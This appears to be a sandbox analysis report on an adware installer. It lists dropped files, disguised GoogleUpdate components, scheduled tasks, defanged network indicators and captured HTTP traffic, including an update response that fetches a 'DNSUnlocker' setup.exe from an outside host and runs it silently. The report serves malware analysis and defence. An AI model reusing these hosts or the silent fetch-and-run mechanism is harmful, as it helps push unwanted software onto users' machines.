%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\40.js (1 bytes)
%Program Files%\winservice86\WebSocket4Net.dll (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\91[1].js (88337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\42.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\93.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\345[1].js (781 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-1.job (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\64.js (2 bytes)
%Program Files%\winservice86\Interop.IWshRuntimeLibrary.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\14.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-1.dll (34023 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils.dll (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\94.js (1 bytes)
%WinDir%\Tasks\temp_f56fe68c-ded6-4656-a272-5100e7b20016.job (1066 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\goopdateres_en.dll (26 bytes)
%Program Files%\winservice86\f56fe68c-ded6-4656-a272-5100e7b20016.exe (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\269.js (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\91.js (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\extension.js (614 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\230.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\380[1].js (25 bytes)
%WinDir%\Tasks\temp_0f606e8f-8393-4f75-a33c-52fa23d9dc61.job (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\180[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\104.js (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateHelper.msi (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\nsisos.dll (5 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-2.job (71 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\102.js (1 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-5.exe (5873 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\psmachine.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\391[1].js (795 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\44.js (1 bytes)
%Program Files%\winservice86\utils.exe (76825 bytes)
%WinDir%\Tasks\0f606e8f-8393-4f75-a33c-52fa23d9dc61.job (70 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-11.exe (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\354[1].js (60025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleCrashHandler.exe (601 bytes)
%WinDir%\Tasks\temp_17b03655-7c85-4e93-aec7-7ee27469780e-2.job (140 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\474543 (359414 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\390[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\app_code[1].js (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\221.js (415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\376[1].js (1417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\78.js (3 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\psuser.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\339[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\263.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\102[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\311[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\bg_code[1].js (432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-4.dll (43318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\UserInfo.dll (4 bytes)
%Program Files%\winservice86\Uninstall.exe (601 bytes)
%Program Files%\winservice86\SuperSocket.ClientEngine.Core.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\update.json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\195.js (410 bytes)
%Program Files%\winservice86\0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\md5dll.dll (6 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.35.9.29
File Description:
Comments:
Language: English (United States)
Company Name: Product Name: Product Version: Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: 1.35.9.29File Description: Comments: Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 34880 | 35328 | 4.13209 | c061a4f004f4d6347691f4655fa02103 |
.data | 40960 | 140 | 512 | 0.818128 | a5a710a52d844b19513b2cab5693dbc3 |
.rdata | 45056 | 9108 | 9216 | 4.0908 | 004265d16597098398ce8e06897dcd29 |
.bss | 57344 | 252880 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 311296 | 4868 | 5120 | 3.64756 | 20f692042b54593897a705a64d67ce50 |
.ndata | 319488 | 8765440 | 8192 | 0 | 0829f71740aab1ab98b33eae21dee122 |
.rsrc | 9084928 | 12440 | 12800 | 2.0553 | 715d118c4337fd84e426a690557b0baa |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://cds.d5k9g9i8.hwcdn.net/installer_updates/002201/update.json | |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=64755&appver=0&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=4&rnd=1456422018 | |
hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?event=3&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&browser=ie,de,te,tc&rnd=1456422014 | |
hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt | |
hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab | |
hxxp://e6845.dscb1.akamaiedge.net/ThawteTimestampingCA.crl | |
hxxp://e6845.dscb1.akamaiedge.net/tss-ca-g2.crl | |
hxxp://crl.usertrust.com/UTN-USERFirst-Object.crl | 178.255.83.2 |
hxxp://cds.d5k9g9i8.hwcdn.net/omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=15720 | |
hxxp://crl.comodoca.com.cdn.cloudflare.net/COMODOCodeSigningCA2.crl | 104.16.89.188 |
hxxp://cds.d5k9g9i8.hwcdn.net/omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720&w=3:srb8i7ffVQQnms6OnFTiOVIQsPnmGlX7lcttC_6BaTih6uWhwp3mxIiy_S7lEHYybrGm75UU8k0MJPIQLiOmNYEEgZ1KfAx1MDLlZkWcKXH173vil3-SF8A76iWobp124hrEOhLy51P05wwXJr4DRa1xcxF_pKLHwzXDDCjWKGg | |
hxxp://cds.d5k9g9i8.hwcdn.net/omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720 | |
hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?rand=15720&event=7&agent_type=2&ibic=8D4C23D6A4134239976F389726A57621IE&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=43&rnd=3029 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/64755/js/na/ie/app_code.js?ver=151&rnd=6315 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/64755/bg/na/ie/bg_code.js?ver=17&rnd=9830 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/64755/plugins/na/ie/plugins.json?ver=128&rnd=5028 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/390.js?ver=1&rnd=41 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/424.js?ver=3&rnd=41 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/391.js?ver=1&rnd=41 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/223.js?ver=9&rnd=41 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/200.js?ver=6&rnd=41 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/273.js?ver=6&rnd=41 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/288.js?ver=4&rnd=41 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/311.js?ver=4&rnd=41 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/339.js?ver=3&rnd=41 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/380.js?ver=1&rnd=41 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/220.js?ver=46&rnd=8467 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/184.js?ver=11&rnd=8467 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/180.js?ver=20&rnd=8467 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/102.js?ver=15&rnd=8467 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/91.js?ver=186&rnd=8467 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/376.js?ver=12&rnd=8467 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/354.js?ver=2&rnd=8467 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/345.js?ver=47&rnd=8467 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/253.js?ver=2&rnd=8467 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/246.js?ver=17&rnd=8467 | |
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=update&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422032&lifetime=18&oldappver=43&oldbgver=1&oldpluginsver=37&rnd=8700 | |
hxxp://fallback.global-ssl.fastly.net/download/66/60001/DNSUnlocker/setup.exe | |
hxxp://s3-website-us-east-1.amazonaws.com/stats.gif?action=daily&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422037&lifetime=23&rnd=3481 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=151&rnd=1461 | |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1456422014&procruntime=28&rnd=1456422042 | |
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&installtime=1456422014&lifetime=0&silent=1&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=28&rnd=1456422042 | |
hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?event=4&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&iep=1&chp=na&ffp=na&browser=ie,de,te,tc&rnd=1456422014 | |
hxxp://js.newcloudrack.com/plugin/apps/64755/plugins/na/ie/plugins.json?ver=128&rnd=5028 | 69.16.175.10 |
hxxp://cdn.roastfiles2017.com/download/66/60001/DNSUnlocker/setup.exe | 185.31.17.249 |
hxxp://js.newcloudrack.com/plugins/mins/273.js?ver=6&rnd=41 | 69.16.175.10 |
hxxp://logs.newdemoonlinecloud.com/monetization.gif?event=3&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&browser=ie,de,te,tc&rnd=1456422014 | 69.16.175.42 |
hxxp://js.newcloudrack.com/plugins/mins/376.js?ver=12&rnd=8467 | 69.16.175.10 |
hxxp://update.newdemoonlinecloud.com/omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720&w=3:srb8i7ffVQQnms6OnFTiOVIQsPnmGlX7lcttC_6BaTih6uWhwp3mxIiy_S7lEHYybrGm75UU8k0MJPIQLiOmNYEEgZ1KfAx1MDLlZkWcKXH173vil3-SF8A76iWobp124hrEOhLy51P05wwXJr4DRa1xcxF_pKLHwzXDDCjWKGg | 69.16.175.10 |
hxxp://stats.newdemoonlinecloud.com/installer.gif?action=started&app=64755&appver=0&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=4&rnd=1456422018 | 54.231.17.4 |
hxxp://update.newdemoonlinecloud.com/omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=15720 | 69.16.175.10 |
hxxp://crl.thawte.com/ThawteTimestampingCA.crl | 23.50.101.163 |
hxxp://js.newcloudrack.com/plugins/mins/220.js?ver=46&rnd=8467 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugin/apps/64755/bg/na/ie/bg_code.js?ver=17&rnd=9830 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/180.js?ver=20&rnd=8467 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/311.js?ver=4&rnd=41 | 69.16.175.10 |
hxxp://stats.newdemoonlinecloud.com/apps.gif?action=install&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&installtime=1456422014&lifetime=0&silent=1&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=28&rnd=1456422042 | 54.231.17.4 |
hxxp://js.newcloudrack.com/plugin/apps/64755/js/na/ie/app_code.js?ver=151&rnd=6315 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/391.js?ver=1&rnd=41 | 69.16.175.10 |
hxxp://update.newdemoonlinecloud.com/installer_updates/002201/update.json | 69.16.175.10 |
hxxp://js.newdemoonlinecloud.com/plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=151&rnd=1461 | 69.16.175.42 |
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | 77.222.148.99 |
hxxp://js.newcloudrack.com/plugins/mins/223.js?ver=9&rnd=41 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/91.js?ver=186&rnd=8467 | 69.16.175.10 |
hxxp://js.newdemoonlinecloud.com/plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=43&rnd=3029 | 69.16.175.42 |
hxxp://update.newdemoonlinecloud.com/omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/288.js?ver=4&rnd=41 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/184.js?ver=11&rnd=8467 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/345.js?ver=47&rnd=8467 | 69.16.175.10 |
hxxp://crl.comodoca.com/COMODOCodeSigningCA2.crl | 104.16.89.188 |
hxxp://stats.newdemoonlinecloud.com/installer.gif?action=finished&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1456422014&procruntime=28&rnd=1456422042 | 54.231.17.4 |
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt | 77.222.148.99 |
hxxp://js.newcloudrack.com/plugins/mins/424.js?ver=3&rnd=41 | 69.16.175.10 |
hxxp://logs.newdemoonlinecloud.com/monetization.gif?rand=15720&event=7&agent_type=2&ibic=8D4C23D6A4134239976F389726A57621IE&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201 | 69.16.175.42 |
hxxp://js.newcloudrack.com/plugins/mins/380.js?ver=1&rnd=41 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/102.js?ver=15&rnd=8467 | 69.16.175.10 |
hxxp://stats.newdemoonlinecloud.com/apps.gif?action=update&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422032&lifetime=18&oldappver=43&oldbgver=1&oldpluginsver=37&rnd=8700 | 54.231.17.4 |
hxxp://ts-crl.ws.symantec.com/tss-ca-g2.crl | 23.50.101.163 |
hxxp://js.newcloudrack.com/plugins/mins/246.js?ver=17&rnd=8467 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/339.js?ver=3&rnd=41 | 69.16.175.10 |
hxxp://logs.newdemoonlinecloud.com/monetization.gif?event=4&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&iep=1&chp=na&ffp=na&browser=ie,de,te,tc&rnd=1456422014 | 69.16.175.42 |
hxxp://js.newcloudrack.com/plugins/mins/390.js?ver=1&rnd=41 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/200.js?ver=6&rnd=41 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/354.js?ver=2&rnd=8467 | 69.16.175.10 |
hxxp://stats.newdemoonlinecloud.com/stats.gif?action=daily&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422037&lifetime=23&rnd=3481 | 54.231.17.4 |
hxxp://js.newcloudrack.com/plugins/mins/253.js?ver=2&rnd=8467 | 69.16.175.10 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=151&rnd=1461 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:35 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1456422146"
Last-Modified: Thu, 25 Feb 2016 17:42:26 GMT
Cache-Control: private, must-revalidate, max-age=900
Content-Length: 1681
Content-Type: application/xml; charset=utf-8
X-HW: 1456422155.dop003.fr7.t,1456422155.cds047.fr7.pr
<?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>. <Ver>151</Ver>. <ShortName>winservice86</ShortName>. <Description>winservice</Description>. <PublisherName>Corporate Inc</PublisherName>. <HomePageLink>NA</HomePageLink>. <JSLink>hXXp://js.newcloudrack.com/plugin/apps/64755/js/na/ie/app_code.js</JSLink>. <GroupID>0</GroupID>. <Domain>NA</Domain>. <RunInIframe>false</RunInIframe>. <ThanksURL>NA</ThanksURL>. <EmailSignature>NA</EmailSignature>. <SettingsURL>NA</SettingsURL>. <CertifiedInstall>NA</CertifiedInstall>. <ExposeSites>NA</ExposeSites>. <RemoteFBApiURL>NA</RemoteFBApiURL>. <DisableIE>true</DisableIE>. <DisableFF>true</DisableFF>. <EnableSearchIE>false</EnableSearchIE>. <EnableSearchFF>false</EnableSearchFF>. <AddressbarIE>NA</AddressbarIE>. <AddressbarFF>NA</AddressbarFF>. <AddressbarFFEnhanced>NA</AddressbarFFEnhanced>. <AddressbarCR>NA</AddressbarCR>. <NewTabURL>NA</NewTabURL>. <NewTabEmbed>NA</NewTabEmbed>. <OpenSearchURL>NA</OpenSearchURL>. <BackgroundJS>hXXp://js.newcloudrack.com/plugin/apps/64755/bg/na/ie/bg_code.js</BackgroundJS>. <BackgroundVer>17</BackgroundVer>. <Manifest>NA</Manifest>. <ChangePrevious>fa
<<< skipped >>>
GET /omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720&w=3:srb8i7ffVQQnms6OnFTiOVIQsPnmGlX7lcttC_6BaTih6uWhwp3mxIiy_S7lEHYybrGm75UU8k0MJPIQLiOmNYEEgZ1KfAx1MDLlZkWcKXH173vil3-SF8A76iWobp124hrEOhLy51P05wwXJr4DRa1xcxF_pKLHwzXDDCjWKGg HTTP/1.1
User-Agent: Google Update/1.3.25.0;winhttp;cup
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
If-Match: "XX-K_Z3raSdv_NbJiy9qMtWg5rI"
Host: update.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 412 Precondition Failed
Date: Thu, 25 Feb 2016 17:42:22 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1454605844"
Last-Modified: Thu, 04 Feb 2016 17:10:44 GMT
Cache-Control: max-age=21600
Content-Length: 993
Content-Type: text/xml; charset=UTF-8
X-HW: 1456422142.dop001.fr7.t,1456422142.cds029.fr7.sr,1456422142.dop003.se1.r,1456422142.cds006.se1.pr,1456422142.cds029.fr7.pr
<?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.0" server="prod">. <daystart elapsed_seconds="56508"/>. <app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">. <updatecheck status="noupdate"/>. <ping status="ok"/>. </app>. <app appid="{84f03351-931d-41a5-a53d-6b5a7a5a2c96}" status="ok">. <updatecheck status="ok">. <urls>. <url codebase="hXXp://cdn.roastfiles2017.com/download/66/60001/DNSUnlocker/"/>. </urls>. <manifest version="1.3.25.36">. <packages>. <package hash="Gf6XxEvl3JcorzFhctEtWsC2muE=" name="setup.exe" required="true" size="1141502"/>. </packages>. <actions>. <action arguments="/verysilent" event="update" run="setup.exe" />. <action version="1.3.25.36" event="postinstall" onsuccess="exitsilentlyonlaunchcmd"/>. </actions>. </manifest>. </updatecheck>. <ping 